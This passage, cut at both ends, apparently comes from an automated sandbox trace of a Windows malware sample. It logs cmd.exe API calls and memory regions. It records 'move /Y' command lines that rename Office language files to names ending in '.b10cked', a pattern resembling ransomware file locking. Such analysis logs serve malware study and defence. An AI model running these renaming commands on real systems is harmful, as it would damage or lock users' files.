lpFilePart=0x2aee90*="XLINTL32.DLL.trx_dll.b10cked") returned 0x4c [0161.707] SetErrorMode (uMode=0x0) returned 0x1 [0161.708] SetLastError (dwErrCode=0x0) [0161.708] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll.b10cked")) returned 
0xffffffff [0161.708] GetLastError () returned 0x2 [0161.708] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ae80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae80c) returned 0x92130 [0161.708] FindNextFileW (in: hFindFile=0x92130, lpFindFileData=0x2ae80c | out: lpFindFileData=0x2ae80c) returned 0 [0161.708] GetLastError () returned 0x12 [0161.708] FindClose (in: hFindFile=0x92130 | out: hFindFile=0x92130) returned 1 [0161.709] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x91cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x91cc0) returned 0x92130 [0161.710] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2aeaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0161.710] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2aeaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0161.710] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll")) returned 0x2020 [0161.710] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0161.710] FindClose (in: hFindFile=0x92130 | out: hFindFile=0x92130) returned 1 [0161.710] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aea58 | out: _Buffer=" 1") returned 9 [0161.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.710] GetFileType (hFile=0x7) returned 0x2 [0161.750] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0161.750] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae9e4 | out: lpMode=0x2ae9e4) returned 1 [0161.750] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.750] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aea18 | out: lpConsoleScreenBufferInfo=0x2aea18) returned 1 [0161.751] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0161.751] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2aea58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0161.751] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2aea3c*=0x1a) returned 1 [0161.751] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.751] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.752] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.752] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.752] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.752] SetConsoleInputExeNameW () returned 0x1 [0161.752] GetConsoleOutputCP () returned 0x1b5 [0161.752] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.752] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.752] exit (_Code=0) Process: id = "275" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x978" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22218 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22219 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22220 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22221 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22222 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22223 start_va = 0x77230000 end_va = 0x7736bfff entry_point 
= 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22224 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22225 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22226 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 22227 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22267 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22268 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22269 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22270 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 22271 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22272 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22273 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 
region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22274 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22275 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22276 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22277 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22278 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22279 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22280 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22281 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 22282 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" 
(normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22283 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22284 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22285 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22286 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22287 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22288 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 22289 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 22290 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 338 os_tid = 0x208 [0161.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa6c | out: lpSystemTimeAsFileTime=0x14fa6c*(dwLowDateTime=0x99c5b260, dwHighDateTime=0x1d440a9)) [0161.734] GetCurrentProcessId () returned 0x978 [0161.734] GetCurrentThreadId () returned 0x208 [0161.734] GetTickCount () returned 0x31100 [0161.734] QueryPerformanceCounter (in: lpPerformanceCount=0x14fa64 | out: lpPerformanceCount=0x14fa64*=21852312677) returned 1 [0161.735] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0161.735] __set_app_type (_Type=0x1) [0161.735] __p__fmode () returned 0x76b331f4 [0161.735] __p__commode () 
returned 0x76b331fc [0161.735] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0161.735] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0161.735] GetCurrentThreadId () returned 0x208 [0161.735] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x208) returned 0x38 [0161.735] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.735] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0161.735] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.735] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0161.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f9fc | out: phkResult=0x14f9fc*=0x0) returned 0x2 [0161.735] VirtualQuery (in: lpAddress=0x14fa33, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0161.736] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f9cc, dwLength=0x1c | out: lpBuffer=0x14f9cc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0161.736] GetConsoleOutputCP () returned 0x1b5 [0161.736] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.736] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0161.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.736] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0161.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.736] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.736] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.736] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.736] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.737] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.737] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0161.737] GetEnvironmentStringsW () returned 0x2d0210* [0161.737] FreeEnvironmentStringsW (penv=0x2d0210) returned 1 [0161.737] GetEnvironmentStringsW () returned 0x2d0210* [0161.737] FreeEnvironmentStringsW (penv=0x2d0210) returned 1 [0161.737] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e96c | out: phkResult=0x14e96c*=0x40) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0xa0, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e974, 
lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x0, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x4) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegCloseKey (hKey=0x40) returned 0x0 [0161.737] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e96c | out: phkResult=0x14e96c*=0x40) returned 0x0 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x40, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.737] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, 
lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x1, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x0, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x9, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x4, lpData=0x14e978*=0x9, lpcbData=0x14e970*=0x4) returned 0x0 [0161.738] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e974, lpData=0x14e978, lpcbData=0x14e970*=0x1000 | out: lpType=0x14e974*=0x0, lpData=0x14e978*=0x9, lpcbData=0x14e970*=0x1000) returned 0x2 [0161.738] RegCloseKey (hKey=0x40) returned 0x0 [0161.738] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886383 [0161.738] srand (_Seed=0x5b886383) [0161.738] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"" [0161.738] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked\"" [0161.738] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0161.738] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0161.738] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0161.738] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.738] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0161.738] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0161.738] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0161.738] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0161.738] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0161.739] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0161.739] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0161.739] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0161.739] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0161.739] GetEnvironmentStringsW () returned 0x2d2360* [0161.739] FreeEnvironmentStringsW (penv=0x2d2360) returned 1 [0161.739] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.739] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.739] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0161.739] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0161.739] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0161.739] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0161.739] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0161.739] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0161.739] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0161.739] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0161.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f738 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.739] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f738, lpFilePart=0x14f734 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f734*="Desktop") returned 0x18 [0161.739] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.739] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f4b4 | out: lpFindFileData=0x14f4b4) returned 0x2d09f0 [0161.739] FindClose (in: hFindFile=0x2d09f0 | out: hFindFile=0x2d09f0) returned 1 [0161.740] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f4b4 | out: lpFindFileData=0x14f4b4) returned 0x2d09f0 [0161.740] FindClose (in: hFindFile=0x2d09f0 | out: hFindFile=0x2d09f0) returned 1 [0161.740] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f4b4 | out: lpFindFileData=0x14f4b4) returned 0x2d09f0 [0161.740] FindClose (in: hFindFile=0x2d09f0 | out: hFindFile=0x2d09f0) returned 1 [0161.740] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.740] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0161.740] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0161.740] GetEnvironmentStringsW () returned 0x2d0210* 
[0161.740] FreeEnvironmentStringsW (penv=0x2d0210) returned 1 [0161.740] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.741] GetConsoleOutputCP () returned 0x1b5 [0161.741] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.741] GetUserDefaultLCID () returned 0x409 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f878, cchData=128 | out: lpLCData="0") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f878, cchData=128 | out: lpLCData="0") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f878, cchData=128 | out: lpLCData="1") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0161.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, 